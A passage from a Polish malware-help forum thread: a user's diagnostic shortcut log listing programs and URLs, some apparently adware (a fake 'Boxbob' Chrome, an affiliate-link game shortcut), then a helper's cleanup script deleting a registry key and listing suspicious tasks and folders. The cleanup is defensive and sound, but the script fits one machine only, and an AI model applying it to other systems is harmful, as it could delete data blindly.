Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (32bit).lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (64bit).lnk -> C:\FL Studio 12.4.2\FL64.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\FL Studio 12\FL.exe (Brak pliku)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\IL Download Manager.lnk -> C:\Program Files (x86)\Image-Line\Downloader\ILDownloadManager.exe (Image-Line)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\SendTo\Transfer plików Bluetooth.LNK -> C:\Windows\System32\fsquirt.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Opera.lnk -> C:\Users\Emil\AppData\Local\Programs\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Emil\AppData\Local\OpenFM\Application\OpenFM.lnk -> C:\Users\Emil\AppData\Local\OpenFM\Application\openfm.exe (Mozilla Foundation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Emil\AppData\Local\GG\Application\gg.lnk -> C:\Users\Emil\AppData\Local\GG\Application\gghub.exe (GG Network S.A.)
Shortcut: C:\Users\Public\Desktop\Adobe Reader 9.lnk -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (Adobe Systems Incorporated)
Shortcut: C:\Users\Public\Desktop\Farming Simulator 17.lnk -> C:\Program Files\Farming Simulator 17\x64\FarmingSimulator2017Game.exe (GIANTS Software GmbH)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Public\Desktop\My Connection.lnk -> C:\Program Files (x86)\My Connection\Maincontroller.exe ()
Shortcut: C:\Users\Public\Desktop\The Sims 4.lnk -> C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe (Electronic Arts Inc.)


ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507


ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk -> C:\Program Files\Intel Security\True Key\application\truekey.exe (Intel Security) -> --open-source=startmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp ACERdt
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - wildgames.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp wildgames
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /7
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Narzędzia pakietu Microsoft Office 2016\Office 2016 Upload Center.lnk -> C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe (Microsoft Corporation) -> "C:\Program Files (x86)\Microsoft Office\Root\Office16\MSOUC.EXE"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\Odinstaluj.lnk -> C:\Program Files\McAfee Security Scan\uninstall.exe (McAfee, Inc.) -> C:\Program Files\McAfee Security Scan\3.11.523\McAfee.ico
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee\McAfee LiveSafe .lnk -> C:\Program Files\Common Files\McAfee\platform\McUICnt.exe (McAfee, Inc.) -> /desktopicon /platui
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\12 Labours of Hercules III Girl Power.lnk -> C:\Program Files (x86)\WildGames\12 Labours of Hercules III Girl Power\12LaboursOfHercules3-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Home Makeover.lnk -> C:\Program Files (x86)\WildGames\Home Makeover\HomeMakeover-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Jewel Match 3.lnk -> C:\Program Files (x86)\WildGames\Jewel Match 3\JewelMatch3-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Jewel Match Snowscapes.lnk -> C:\Program Files (x86)\WildGames\Jewel Match Snowscapes\JMS-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Magic Academy.lnk -> C:\Program Files (x86)\WildGames\Magic Academy\academy-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Polar Bowler 1st Frame.lnk -> C:\Program Files (x86)\WildGames\Polar Bowler 1st Frame\PBFF-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Rory's Restaurant.lnk -> C:\Program Files (x86)\WildGames\Rorys Restaurant\RorysRestaurant-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Runefall.lnk -> C:\Program Files (x86)\WildGames\Runefall\Runefall-WT.exe (WildTangent, Inc.) -> /launchgc /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Vegas World.lnk -> C:\Program Files (x86)\WildTangent Games\Web Link - Vegas World\launcher.exe (WildTangent) -> /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Villagers and Heroes.lnk -> C:\Program Files (x86)\WildTangent Games\Web Link - Villagers and Heroes\launcher.exe (WildTangent) -> /src gamesmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\WildTangent Games App - acer.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp ACERdt
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\WildTangent Games App - wildgames.lnk -> C:\Program Files (x86)\WildTangent Games\App\GameConsole-wt.exe (WildTangent) -> /src gamesmenu /dp wildgames
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\abFiles.lnk -> C:\Program Files (x86)\Acer\abFiles\abFilesTrayIcon.exe (acer) -> 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Acer Recovery Management.lnk -> C:\Program Files (x86)\Acer\Care Center\CareCenter.exe () -> eRecovery
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer\Dokumenty Acer.lnk -> C:\OEM\Preload\Autorun\GUI\Acer User's Manual\00\OnePager.exe () -> /folder
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{a4744eb8-e18d-4808-a161-5af6b46992e5}\PlayTasks\0\Rory's Restaurant.lnk -> C:\Program Files (x86)\WildGames\Rorys Restaurant\RorysRestaurant-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{922028cd-48ee-4fac-b702-091641a630a3}\PlayTasks\0\Runefall.lnk -> C:\Program Files (x86)\WildGames\Runefall\Runefall-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{5efc38bb-2dab-4442-8e97-38975fa121af}\PlayTasks\0\Magic Academy.lnk -> C:\Program Files (x86)\WildGames\Magic Academy\academy-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{4ab17087-5348-4a14-8af5-cd43a0707d5f}\PlayTasks\0\Polar Bowler 1st Frame.lnk -> C:\Program Files (x86)\WildGames\Polar Bowler 1st Frame\PBFF-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{471351f0-4e8a-47bf-a6b3-3de3c99ae340}\PlayTasks\0\Jewel Match 3.lnk -> C:\Program Files (x86)\WildGames\Jewel Match 3\JewelMatch3-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{3e271096-cfd0-4d5e-b718-46848370788b}\PlayTasks\0\Home Makeover.lnk -> C:\Program Files (x86)\WildGames\Home Makeover\HomeMakeover-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{366930df-1fad-4379-a989-0dd7f315ad45}\PlayTasks\0\12 Labours of Hercules III Girl Power.lnk -> C:\Program Files (x86)\WildGames\12 Labours of Hercules III Girl Power\12LaboursOfHercules3-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{17debf67-d01f-4e9d-9869-a8aa73658458}\PlayTasks\0\Jewel Match Snowscapes.lnk -> C:\Program Files (x86)\WildGames\Jewel Match Snowscapes\JMS-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Default Apps.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPageAppsDefaults
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Devices.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPagePCSystemDevices
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /0
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Default Apps.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPageAppsDefaults
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Devices.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPagePCSystemDevices
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /0
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Public\Desktop\Dokumenty Acer.lnk -> C:\OEM\Preload\Autorun\GUI\Acer User's Manual\00\OnePager.exe () -> /folder
ShortcutWithArgument: C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll


InternetURL: C:\Users\Default\Favorites\Booking.com.url -> URL: hxxp://www.booking.com/index.html?aid=379334
InternetURL: C:\Users\Default\Favorites\Acer\Acer.url -> URL: hxxp://www.acer.com/
InternetURL: C:\Users\Emil\Favorites\Bing.url -> URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
InternetURL: C:\Users\Emil\Favorites\Booking.com.url -> URL: hxxp://www.booking.com/index.html?aid=379334
InternetURL: C:\Users\Emil\Favorites\Links\ACER Akcesoria.url -> URL: hxxp://go.acer.com/?id=14173&model=Aspire E5-573G
InternetURL: C:\Users\Emil\Favorites\Acer\Acer.url -> URL: hxxp://www.acer.com/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Bantana Audio Website.url -> URL: hxxp://bantanaaudio.com/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Bantana Powered Production.url -> URL: hxxps://www.facebook.com/groups/BantanaAudio/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Deep House Bedroom Producers.url -> URL: hxxps://www.facebook.com/groups/deephousebedroomproducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Future Bass Producers Group.url -> URL: hxxps://www.facebook.com/groups/FutureBassBedroomProducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Trap and Dubstep Producers Group.url -> URL: hxxps://www.facebook.com/groups/BantanaDubstepProducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Tropical House Producers Group.url -> URL: hxxps://www.facebook.com/groups/tropicalhousebedroomproducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Audio.url -> URL: hxxps://soundcloud.com/bantana
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Mastering.url -> URL: hxxps://soundcloud.com/bantana-mastering
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana.url -> URL: hxxps://soundcloud.com/bantana_records
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Bantana Audio Website.url -> URL: hxxp://bantanaaudio.com/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Bantana Powered Production.url -> URL: hxxps://www.facebook.com/groups/BantanaAudio/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Deep House Bedroom Producers.url -> URL: hxxps://www.facebook.com/groups/deephousebedroomproducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Future Bass Producers Group.url -> URL: hxxps://www.facebook.com/groups/FutureBassBedroomProducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Trap and Dubstep Producers Group.url -> URL: hxxps://www.facebook.com/groups/BantanaDubstepProducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Tropical House Producers Group.url -> URL: hxxps://www.facebook.com/groups/tropicalhousebedroomproducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Audio.url -> URL: hxxps://soundcloud.com/bantana
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Mastering.url -> URL: hxxps://soundcloud.com/bantana-mastering
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana.url -> URL: hxxps://soundcloud.com/bantana_records

==================== Koniec  Shortcut.txt =============================
emillo2502
~user
 
Posty: 15
Dołączenie: 16 Lis 2013, 14:09



Problem z mozilla i zawieszającym się systemem

Postprzez ordynat 22 Kwi 2017, 16:47

Otwórz Notatnik i wklej w nim:
StartRegedit:
Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Eastness]

EndRegedit:

2017-04-13 14:55 - 2017-04-13 14:56 - 00003686 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:54 - 2017-04-13 14:54 - 00000000 ____D C:\Users\Emil\AppData\Roaming\SSMgre
2017-04-17 15:31 - 2017-04-17 15:31 - 00000000 ____D C:\ProgramData\Software
2017-04-19 17:40 - 2017-04-19 17:40 - 00000000 ____D C:\Users\Emil\AppData\Local\3DM
2017-04-19 17:37 - 2017-04-21 14:53 - 00000000 _____ C:\WINDOWS\SysWOW64\1
